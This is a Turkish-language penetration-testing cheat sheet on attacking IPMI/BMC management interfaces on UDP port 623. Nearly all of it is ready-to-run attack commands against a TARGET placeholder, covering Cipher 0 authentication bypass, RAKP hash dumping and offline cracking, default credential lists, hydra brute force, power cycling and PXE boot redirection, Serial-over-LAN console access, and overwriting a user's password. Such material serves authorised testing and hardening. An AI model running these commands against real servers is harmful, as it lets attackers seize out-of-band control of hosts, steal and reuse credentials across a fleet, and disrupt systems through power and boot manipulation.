623/UDP - IPMI
network ipmi
IPMI (UDP/623) sunucu BMC out-of-band yönetimidir. Ağdan erişilebilen BMC, Cipher 0 ve zayıf hash ile sıkça credential veya güç kontrolü verir.
Metodoloji
Section titled “Metodoloji”-
UDP/623 ve varsa HTTP/HTTPS BMC arayüzünü doğrula.
-
Cipher 0 ve anonymous/null auth dene.
-
RAKP hash dump alıp offline kır.
-
Geçerli kimlikle power/boot/SOL ve pivot kanıtı üret.
nmap -Pn -sU -p623 -sV --script ipmi-version,ipmi-cipher-zero TARGETnmap -Pn -p80,443,623,5900,5120 -sV TARGETmsfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_version; set RHOSTS TARGET; run; exit"Cipher 0
Section titled “Cipher 0”msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_cipher_zero; set RHOSTS TARGET; run; exit"ipmitool -I lanplus -C 0 -H TARGET -U ADMIN -P ADMIN chassis statusCipher 0 = auth bypass benzeri zayıf kanal (birçok eski BMC)Hash dump (RAKP)
Section titled “Hash dump (RAKP)”msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_dumphashes; set RHOSTS TARGET; run; exit"hashcat -m 7300 ipmi.hashes rockyou.txtjohn --format=rakp ipmi.hashes --wordlist=rockyou.txtVarsayılan kimlikler
Section titled “Varsayılan kimlikler”ADMIN:ADMINadmin:adminroot:rootroot:calvinADMIN:(boş)ipmitool -I lanplus -H TARGET -U ADMIN -P ADMIN user listipmitool -I lanplus -H TARGET -U ADMIN -P ADMIN chassis statusipmitool -I lanplus -H TARGET -U ADMIN -P ADMIN power statusSOL / konsol
Section titled “SOL / konsol”ipmitool -I lanplus -H TARGET -U ADMIN -P ADMIN sol activateipmitool -I lanplus -H TARGET -U ADMIN -P ADMIN chassis bootdev pxeipmitool -I lanplus -H TARGET -U ADMIN -P ADMIN power cycleHTTP BMC paneli
Section titled “HTTP BMC paneli”curl -skI https://TARGET/hydra -L users.txt -P rockyou.txt https-get://TARGET/nuclei -u https://TARGET -tags iom,bmc,ipmiPost-erişim
Section titled “Post-erişim”- Host power off/on- Boot media değiştirme- SOL ile OS öncesi erişim- BMC credential → fleet-wide reuseipmitool -I lanplus -H TARGET -U ADMIN -P ADMIN user set password 2 'NewP@ss'Checklist
Section titled “Checklist”[ ] UDP/623 fingerprint[ ] Cipher 0 denendi[ ] RAKP hash dump + crack[ ] Default creds / geçerli oturum[ ] SOL veya power etkisi kanıtlandı